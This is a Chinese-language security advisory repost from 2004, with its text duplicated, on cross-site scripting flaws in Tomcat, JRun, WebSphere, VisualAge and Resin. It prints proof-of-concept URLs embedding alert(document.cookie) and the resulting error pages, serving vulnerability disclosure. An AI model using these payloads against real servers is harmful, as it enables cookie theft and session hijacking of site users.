Java Servlet 包含有交叉站点的脚本漏洞
2004-09-01 19:21
531 查看
多家厂商的 多家厂商的 Java Servlet 包含有交叉站点的脚本漏洞。
br> ===========================================
受到影响的产品有:
=================
Tomcat 3.2.1, 3.2.2-beta, 4.0-beta
JRun 3.0 WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional
不受影响的产品,目前还没有发现。
漏洞:
=======
采用下面的 URL,在浏览器上的 JavaScript 代码可以在服务器的域上执行。
Tomcat 3.2.1: http://Tomcat/jsp-mapped-dir/alert(document.cookie).jsp
JRun 3.0: http://JRun/alert(document.cookie).shtml http://JRun/alert(document.cookie).jsp http://JRun/alert(document.cookie).thtml
WebSphere 3.5 FP2:
http://WebSphere/webapp/examples/alert(document.cookie)
WebSphere 3.02:
http://WebSphere/alert(document.cookie).jsp VisualAge for Java 3.5 Professional:
http://VisualAge-WebSphere-Test-Environment/alert(document.cookie) Resin 1.2.2:
http://Reisin/alert(document.cookie).jsp http://www.caucho.com/document.write(document.cookie).jsp 这些页面的输出如下 ================================================= Error 404 An error has occurred while processing request: http://WebSphere/webapp/examples/****** Message: File not found: file://****** StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: file://****** at javax.servlet.ServletException.(ServletException.java:107) at com.ibm.websphere.servlet.error.ServletErrorReport.(ServletErrorReport.java:31) at com.ibm.servlet.engine.webapp.WebAppErrorReport.(WebAppErrorReport.java:20) at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97) ... ================================================= ******: The JavaScript code is executed here.
这些漏洞和微软于去年 8月 25 日发布的 IIS 的交叉站点漏洞脚本很相似
br> ===========================================
受到影响的产品有:
=================
Tomcat 3.2.1, 3.2.2-beta, 4.0-beta
JRun 3.0 WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional
不受影响的产品,目前还没有发现。
漏洞:
=======
采用下面的 URL,在浏览器上的 JavaScript 代码可以在服务器的域上执行。
Tomcat 3.2.1: http://Tomcat/jsp-mapped-dir/alert(document.cookie).jsp
JRun 3.0: http://JRun/alert(document.cookie).shtml http://JRun/alert(document.cookie).jsp http://JRun/alert(document.cookie).thtml
WebSphere 3.5 FP2:
http://WebSphere/webapp/examples/alert(document.cookie)
WebSphere 3.02:
http://WebSphere/alert(document.cookie).jsp VisualAge for Java 3.5 Professional:
http://VisualAge-WebSphere-Test-Environment/alert(document.cookie) Resin 1.2.2:
http://Reisin/alert(document.cookie).jsp http://www.caucho.com/document.write(document.cookie).jsp 这些页面的输出如下 ================================================= Error 404 An error has occurred while processing request: http://WebSphere/webapp/examples/****** Message: File not found: file://****** StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: file://****** at javax.servlet.ServletException.(ServletException.java:107) at com.ibm.websphere.servlet.error.ServletErrorReport.(ServletErrorReport.java:31) at com.ibm.servlet.engine.webapp.WebAppErrorReport.(WebAppErrorReport.java:20) at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97) ... ================================================= ******: The JavaScript code is executed here.
这些漏洞和微软于去年 8月 25 日发布的 IIS 的交叉站点漏洞脚本很相似
相关文章推荐
- Java Servlet 包含有交叉站点的脚本漏洞
- [漏洞利用]某站点登录接口暴力破解脚本
- 远程包含漏洞挖掘脚本
- PowerShell包含另一个脚本文件和获取当前脚本所在目录的方法例子
- SQL Server里面如何导出包含数据的SQL脚本
- 跨站脚本执行漏洞详解
- SHELL脚本替换包含指定字符串的行
- D-link DSL-2640T 跨站脚本漏洞(CVE-2018-18636)
- 360某站点MySQL注射(附验证脚本)
- 头文件交叉包含引起的错误
- 文件包含漏洞之本地包含和远程包含
- SQL Server里面如何导出包含数据的SQL脚本
- WordPress BackupBuddy插件importbuddy.php脚本信息泄露漏洞
- [2015-11-23]分享一个批处理脚本,创建iis站点及程序池
- 文件包含漏洞的利用
- SQL Server 2005 导出包含(insert into)数据的SQL脚本 (使用存储过程)
- SHELL脚本替换包含指定字符串的行
- MySQL 登录漏洞的测试脚本
- PHP本地文件包含漏洞环境搭建与利用
- Mozilla FireFox 爆JAR URI处理跨站脚本漏洞 可偷窃Google帐户